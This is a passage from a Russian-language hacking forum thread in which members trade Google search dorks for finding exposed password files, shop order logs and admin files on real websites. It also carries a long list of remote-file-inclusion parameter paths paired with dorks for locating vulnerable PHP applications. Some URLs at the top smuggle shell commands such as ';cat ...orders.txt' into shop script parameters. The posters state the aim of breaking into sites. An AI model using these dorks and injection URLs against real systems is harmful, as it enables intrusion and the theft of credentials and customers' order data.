    /mysql/expire.mdb
    490. 
    /scripts/shop/auth_data/auth_user_file.txt
    491. 
    /cgi-bin/cart32/whatever-OUTPUT.txt
    492. 
    /Shopping%20Cart/shopdbtest.asp
    493. 
    /cgi/shop/auth_data/auth_user_file.txt
    494. 
    /shop/shopping350.mdb
    495. 
    /cgi-bin/store/Authorize_Net.pl
    496. 
    /scripts/DCShop/orders/orders.txt
    497. 
    /store/log_files/commerce_user_lib.pl
    498. 
    /shopping/shopadmin.asp
    499. 
    /cgi-bin/orderlog.txt
    500. 
    /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
    501. /cool-logs/mylog.html
    502. 
    /cgibin/shop.pl/page=;cat%20shop.pl
    503. 
    /htbin/shop.pl/page=;cat%20shop.pl
    504. 
    /cgi-win/orders/orders.txt
    505. 
    /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
    506. 
    /SHOP/shopdbtest.asp
    507. 
    /cgi/pagelog.cgi
    508. 
    /php/mlog.phtml
    509. 
    /cgi-bin/shop/apdproducts.mdb
    510. 
    /htbin/shop/auth_data/auth_user_file.txt
    511. 
    /server%20logfile;;;
    512. /database/metacart.mdb
    513. 
    /cgi-local/shop/orders/orders.txt
     
  8. Фещ

    Фещ Banned

    Joined:
    20 Aug 2007
    Messages:
    127
    Likes Received:
    91
    Reputations:
    -11
    я уже 2 раза на honeypot нарвался! поаккуратнее юзайте!
     
  9. nbd

    nbd Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    82
    Likes Received:
    26
    Reputations:
    3
    Да "меда" действительно много :)
    В большинстве своем ханипоты выдают себя изобилием "дыр", если перед твоим взором предстали файлы: password.txt, passwd, admin_password, users.txt (в пределах одной диры) и т.д. можешь быть уверен на 100% это ханипот :)
     
  10. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    210
    Likes Received:
    84
    Reputations:
    11
    1 person likes this.
  11. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    178
    Likes Received:
    214
    Reputations:
    8
    Ломаем сайты на FrontPage =))
    Code:
    ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
    
     
    2 people like this.
  12. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,296
    Likes Received:
    585
    Reputations:
    31
    Там пассы в DES?
     
  13. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    178
    Likes Received:
    214
    Reputations:
    8
    Да

    Чуть мега полезных
    Code:
    filetype:htpasswd htpasswd 
             allinurl:auth_user_file.txt 
             inurl:zebra.conf intext:password -sampe -test -tutorial -download  
             intitle:"index of" intext:globals.inc 
             filetype:dat "password dat"
    
    И еще чуть от меня (для поиска уязвимых скриптов)
    Code:
    /surveys/survey.inc.php?path= inurl:surveys 
    index.php?body= inurl:"index.php?body=" 
    /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl 
    enc/content.php?Home_Path= "powered by doodle cart" 
    /classified_right.php?language_dir= inurl:classified.php phpbazar 
    /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)" 
    /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)" 
    /embed/day.php?path= intitle:"Login to Calendar" 
    /includes/dbal.php?eqdkp_root_path= "powered by EQdkp" 
    /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" 
    /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base" 
    /mcf.php?content= allinurl:"mcf.php" site:.de 
    /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.ar 
    skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS" 
    /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6" 
    /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat" 
    /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom" 
    /main.php?sayfa= inurl:"main.php?sayfa=" 
    /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration 
    /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/" 
    /header.php?abspath= "MobilePublisherPHP" 
    components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs" 
    administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository 
    impex/ImpExData.php?systempath= intext:powered by vbulletin 
    /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com 
    /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3" 
    administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository 
    /tools/send_reminders.php?includedir= allinurl:day.php?date= 
    /skin/zero_vote/error.php?dir= skin/zero_vote/error.php 
    /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar 
    /login.php?dir= allinurl:login.php?dir= 
    /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php 
    index.php?pageurl= inurl:"index.php?pageurl=*.php" 
    /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system 
    index.php?var= inurl:"index.php?var=*.php" 
    index.php?pagina= inurl:"index.php?pagina=*.php" 
    index.php?go= inurl:"index.php?go=" 
    index.php?site= inurl:"index.php?site=" 
    phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id=" 
    administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler" 
    index.php?pagina= inurl:"index.php?pagina=*.php" 
    index.php?id= inurl:"index.php?id=*.php" 
    index1.php?= inurl:"index1.php?=*.php? 
    index.php?site= inurl:"index.php?site=*.php" 
    main.php?id= inurl:"main.php?id=*.php" 
    content.php?page= inurl:"content.php?page=*.php" 
    admin.php?page= inurl:"admin.php?page=*.php" 
    lib/gore.php?libpath= inurl:"/SQuery/" 
    SQuery/lib/gore.php?libpath= inurl:"/SQuery/" 
    index2.php?p= inurl:"index2.php?p=*.php" 
    index1.php?go=  inurl:"index1.php?go=*.php" 
    news_detail.php?file= inurl:"news_detail.php?file=*.php" 
    old_reports.php?file= inurl:"old_reports.php?file=*.php" 
    index.php?x= inurl:"index.php?x=*.php" 
    index.php?nic= inurl:"index.php?nic=*.php" 
    homepage.php?sel= inurl:"homepage.php?sel=*.php" 
    index.php?sel= inurl:"index.php?sel=*.php" 
    main.php?x= inurl:"main.php?x=*.php" 
    components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks" 
    index2.php?x= inurl:index2.php?x=*.php" 
    main.php?pagina= inurl:"main.php?pagina=*.php" 
    test.php?page= allinurl:test.php?page= 
    components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop" 
    akocomments.php?mosConfig_absolute_path= inurl:akocomments.php 
    index.php?page= inurl:"edu/index.php?page=*.php" 
    *.php?page= inurl:*.php?page=*.php" 
    index.php?oldal= inurl:"index.php?oldal=*.php" 
    index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php" 
    index.php?pag= inurl:"index.php?pag=*.php" 
    index.php?incl= inurl:"index.php?incl=" 
    avatar.php?page= inurl:"avatar.php?page=" 
    index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free 
    index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is" 
    ndex.php?p= inurl:"edu/index.php?p=*.php" 
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/ 
    index.php?x= inurl:"com/index.php?x=*.php" 
    index.php?mode= inurl:"com/index.php?mode=*.php" 
    index.php?stranica= inurl:"index.php?stranica=" 
    index.php?sub= inurl:"il/index.php?sub=*.php" 
    index.php?id= inurl:"/index.php?id=*.php" 
    index.php?t= inurl:"/index.php?t=*.php" 
    index.php?r= inurl:"index.php?r=*.php" 
    index.php?menu= inurl:"net/index.php?menu=*.php" 
    index.php?pag= inurl:"com/index.php?pag=*.php" 
    solpot.html?body= allinurl: "solpot.html?body"  
    port.php?content= inurl:port.php?content=*.php" 
    index0.php?show= inurl:index0.php?show=*.php" 
    administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" 
    /tools/send_reminders.php?includedir= allinurl:day.php?date=  inurl:/day.php?date= 
    administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository 
    /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br 
    administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" 
    content.php?page= inurl:"*content.php?page=*.php" 
    index.php?topic= inurl:"/index.php?topic=*.php" 
    index.php?u= inurl:"/index.php?u=*.php" 
    administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory" 
    administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components" 
    modules/My_eGallery/index.php?basepath= inurl:"My_eGallery" 
    /modules/vwar/admin/admin.php?vwar_root= inurl:"vwar" 
    index.php?loc= allinurl:.br/index.php?loc= 
    administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler" 
    administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage" 
    /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php 
    myevent.php?myevent_path= inurl:myevent.php 
    /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp" 
    myevent.php?myevent_path= inurl:"uk/myevent.php 
    includes/functions.php?phpbb_root_path= powered by Integramod 
    m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php? 
    /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php 
    administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository 
    show.php?path= inurl:fclick 
    show.php?path= inurl:.ac.uk/fclick 
    administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory" 
    administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits" 
    index.php?template= inurl:"index.php?" 
    search.php?cutepath= inurl:"search.php?" 
    show_news.php?cutepath= inurl:"show_news.php?" 
    page.php?doc= allinurl:"page.php?doc=" 
    administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring" 
    administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=  inurl:".de.*/com_mgm" 
    help.php?css_path= inurl:phplive site:.ru 
    components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/" 
    big.php?pathtotemplate= inurl:".de.*"big.php?" 
    includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?" 
    interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS" 
    /functions.php?include_path= "powered by: phpecard" 
    modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery" 
    components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/" 
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"      
    /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"    
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks" 
    /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/  
    index2.php?to= inurl:"/index2.php?to=*.php" 
    index.php?load= inurl:"/index.php?load=*.php" 
    home.php?pagina= inurl:"home.php?pagina=" 
    /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine 
    /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums 
    /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar 
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2 
    /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery 
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery 
    /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum 
    /include/write.php?dir= allinurl:/zboard/zboard.php 
    db.php?path_local= inurl:"db.php?path_local=" 
    index.php?site= inurl:"index.php?site=" 
    index.php?url= inurl:"index.php?url=" 
    index.php?p= inurl:"index.php?p=" 
    index.php?openfile= inurl:"index.php?openfile=" 
    index.php?file= inurl:"index.php?file=" 
    index.php?go= inurl:"index.php?go=" 
    index.php?content= inurl:"index.php?content=" 
    index.php?side= inurl:"index.php?side=" 
    index.php?kobr= inurl:"index.php?kobr="index.php?pg= inurl:"index.php?pg=" 
    index.php?doc= inurl:"index.php?doc=" 
    index.php?l= inurl:"index.php?l=" 
    index.php?a= inurl:"index.php?a=" 
    index.php?principal= inurl:"index.php?principal=" 
    index.php?show= inurl:"index.php?show=" 
    index.php?opcao= inurl:"index.php?opcao=" 
    index.php?conteudo= inurl:"index.php?conteudo=" 
    index.php?meio= inurl:"index.php?meio=" 
    index.php?inc= inurl:"index.php?inc=" 
    index.php?c= inurl:"index.php?c=" 
    index.php?rage= inurl:"index.php?rage=" 
    index.php?arquivo= inurl:"index.php?arquivo=" 
    index.php?nic= inurl:"index.php?nic=" 
    index.php?x= inurl:"index.php?x=" 
    components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:"com_mtree" 
    index.php?place= inurl:"index.php?place=" 
    index.php?show= inurl:"index.php?show=" 
    index.php?dsp= inurl:"index.php?dsp=" 
    index.php?dept= inurl:"index.php?dept=" 
    index.php?lg= inurl:"index.php?lg=" 
    index.php?inhalt= inurl:"index.php?inhalt=" 
    index.php?ort= inurl:"index.php?ort=" 
    index.php?pilih= inurl:"index.php?pilih=" 
    principal.php?conteudo= inurl:"principal.php?conteudo=" 
    main.php?site= inurl:"main.php?site=" 
    template.php?pagina= inurl:"template.php?pagina=" 
    contenido.php?sec= inurl:"contenido.php?sec=" 
    index_principal.php?pagina= inurl:"index_principal.php?pagina=" 
    template.php?name= inurl:"template.php?name=" 
    forum.php?act= inurl:"forum.php?act=" 
    home.php?action= inurl:"home.php?action=" 
    home.php?pagina= inurl:"home.php?pagina=" 
    noticias.php?arq= inurl:"noticias.php?arq=" 
    main.php?x= inurl:"main.php?x=" 
    main.php?page= inurl:"main.php?page=" 
    default.php?page= inurl:"default.php?page=" 
    index.php?cont= inurl:"index.php?cont=" 
    index.php?configFile= inurl:"index.php?configFile=" 
    index.php?meio.php= inurl:"index.php?meio.php=" 
    index.php?include= inurl:"index.php?include=" 
    index.php?open= inurl:"index.php?open= 
    index.php?visualizar= inurl:"index.php?visualizar=" 
    index.php?x= inurl:"index.php?x=" 
    index.php?pag= inurl:"index.php?pag=" 
    index.php?cat= inurl:"index.php?cat=" 
    index.php?action= inurl:"index.php?action=" 
    index.php?do= inurl:"index.php?do=" 
    index2.php?x= inurl:"index2.php?x=" 
    index2.php?content= inurl:"index2.php?content=" 
    main.php?pagina= inurl:"main.php?pagina=" 
    index.phpmain.php?x= inurl:"index.phpmain.php?x=" 
    index.php?link= inurl:"index.php?link=" 
    index.php?canal= inurl:"index.php?canal=" 
    index.php?screen= inurl:"index.php?screen=" 
    index.php?langc= inurl:"index.php?langc=" 
    services.php?page= inurl:"services.php?page=" 
    htmltonuke.php?filnavn= inurl:"htmltonuke.php?filnavn=" 
    ihm.php?p= inurl:"ihm.php?p=" 
    default.php?page= inurl:"default.php?page=" 
    folder.php?id= inurl:"folder.php?id=" 
    index.php?Load= inurl:"index.php?Load=" 
    index.php?Language= inurl:"index.php?Language=" 
    hall.php?file= inurl:"hall.php?file=" 
    hall.php?page= inurl:"hall.php?page=" 
    template.php?goto= inurl:"template.php?goto=" 
    video.php?content= inurl:"video.php?content=" 
    pages.php?page= inurl:"pages.php?page=" 
    print.php?page= inurl:"print.php?page=" 
    show.php?page= inurl:"show.php?page=" 
    view.php?page= inurl:"view.php?page=" 
    media.php?page= inurl:"media.php?page=" 
    index1.php?choix= inurl:"index1.php?choix=" 
    index1.php?menu= inurl:"index1.php?menu" 
    index.php?ort= inurl:"index.php?ort=" 
    index2.php?showpage= inurl:"index2.php?showpage=" 
    index2.php?ascii_seite= inurl:"index2.php?ascii_seite=" 
    index2.php?DoAction= inurl:"index2.php?DoAction=" 
    index2.php?ID= inurl:"index2.php?ID=" 
    index2.php?url_page= inurl:"index2.php?url_page=" 
    index1.php?dat= inurl:"index1.php?dat=" 
    index1.php?site= inurl:"index1.php?site=" 
    index0.php?show= inurl:"index0.php?show=" 
    home.php?content= inurl:"home.php?content=" 
    port.php?content= inurl:"port.php?content=" 
    main.php?link= inurl:"main.php?link=" 
    home.php?x= inurl:"home.php?x=" 
    index1.php?x= inurl:"index1.php?x=" 
    index2.php?x= inurl:"index2.php?x=" 
    main.php?x= inurl:"main.php?x=" 
    homepage.php?sel= inurl:"homepage.php?sel=" 
    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/ 
    /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/ 
    /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ 
    /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php 
    /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php 
    /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum 
    /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved" 
    /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved" 
    /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=* 
    /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang= 
    /classes.php?LOCAL_PATH= "powered by siteframe" 
    al_initialize.php?alpath= "Powered by AutoLinks Pro" 
    /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/* 
    /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov* 
    /extensions/moblog/moblog_lib.php?basedir= "powered by pivot" 
    /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2" 
    components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs" 
    modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests" 
    /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery" 
    /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf" 
    /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg 
    administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook" 
    /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1" 
    inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script rйalisй par BinGo PHP" 
    /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/" 
    /jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php" 
    /popup_window.php?site_isp_root= inurl:"Squirrelcart" 
    /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse 
    /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr 
    /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:us 
    /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
    
     
    #13 _-Ramos-_, 1 Sep 2007
    Last edited: 1 Sep 2007
    1 person likes this.
  14. helat

    helat Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    187
    Likes Received:
    45
    Reputations:
    5
    http://www-swiss.ai.mit.edu/6805/articles/crypto/ota-infosec/02order.info.txt
    сенксс
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    579
    Likes Received:
    284
    Reputations:
    -56
    johnny.ihackstuff.com там всё это есть...хекеры...
     
    1 person likes this.
  16. Isis

    Isis Мафиозя //хекед :D

    Joined:
    20 Nov 2006
    Messages:
    3,484
    Likes Received:
    1,203
    Reputations:
    252
    http://google.com/robots.txt
    :D
     
    1 person likes this.
  17. Freedom

    Freedom Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    215
    Likes Received:
    92
    Reputations:
    8
    Прикол :)
     
  18. Lithium

    Lithium Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    6
    Likes Received:
    21
    Reputations:
    0
    Не считаться с гугл хаком глупо...Все наверное помнят как Андриан Лэймо вытащил БД французского банка с помошью Гугла...Запрос не помню, забыл уже...
     
    2 people like this.
  19. svoyak

    svoyak New Member

    Joined:
    14 Feb 2011
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    kod

    allinurl: "proxylist.txt"
    allinurl: "proxy.txt"
    "index of/root"
    "auth_user_file.txt"
    "index of/root"
    "Index of /admin"
    "Index of /password"
    "Index of /mail"
    "Index of /" +passwd
    "Index of /" +password.txt
    "Index of /" +.htaccess
    index of ftp +.mdb allinurl:/cgi-bin/ +mailto
    administrators.pwd.index
    authors.pwd.index
    service.pwd.index
    filetype:config web
    gobal.asax index
    allintitle: "index of/admin"
    allintitle: "index of/root"
    allintitle: sensitive filetype oc
    allintitle: restricted filetype :mail
    allintitle: restricted filetype oc site:gov
    for IIS server exlpoit
    allinurl: winnt/system32/
    and u’ll get many IIS server exploitsъ
    intitle:r57shell
    intitle:"Index of" .sh_history
    intitle:"Index of" .bash_history
    intitle:"index of" passwd
    intitle:"index of" people.lst
    intitle:"index of" pwd.db
    intitle:"index of" etc/shadow
    intitle:"index of" spwd
    intitle:"index of" master.passwd
    intitle:"index of" htpasswd
    intitle:"index of" members OR accounts
    intitle:"index of" user_carts OR user_cart
    _vti_inf.html
    service.pwd
    users.pwd
    authors.pwd
    administrators.pwd
    shtml.dll
    shtml.exe
    fpcount.exe
    default.asp
    showcode.asp
    sendmail.cfm
    getFile.cfm
    imagemap.exe
    test.bat
    msadcs.dll
    htimage.exe
    counter.exe
    browser.inc
    hello.bat
    default.asp\
    dvwssr.dll
    cart32.exe
    add.exe
    index.jsp
    SessionServlet
    glimpse
    man.sh
    AT-admin.cgi
    AT-generate.cgi
    inurl:/adpassword.txt
    inurl:admin.dat
    and even for shop sites:
    inurl:/shop/db/
    intitle:"index of/ shop" +db
    intitle:"index of/" +shopping_cart
     
  20. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    412
    Likes Received:
    170
    Reputations:
    12
    svoyak, спасибо археолог, за копипаст первого сообщения
     
Loading...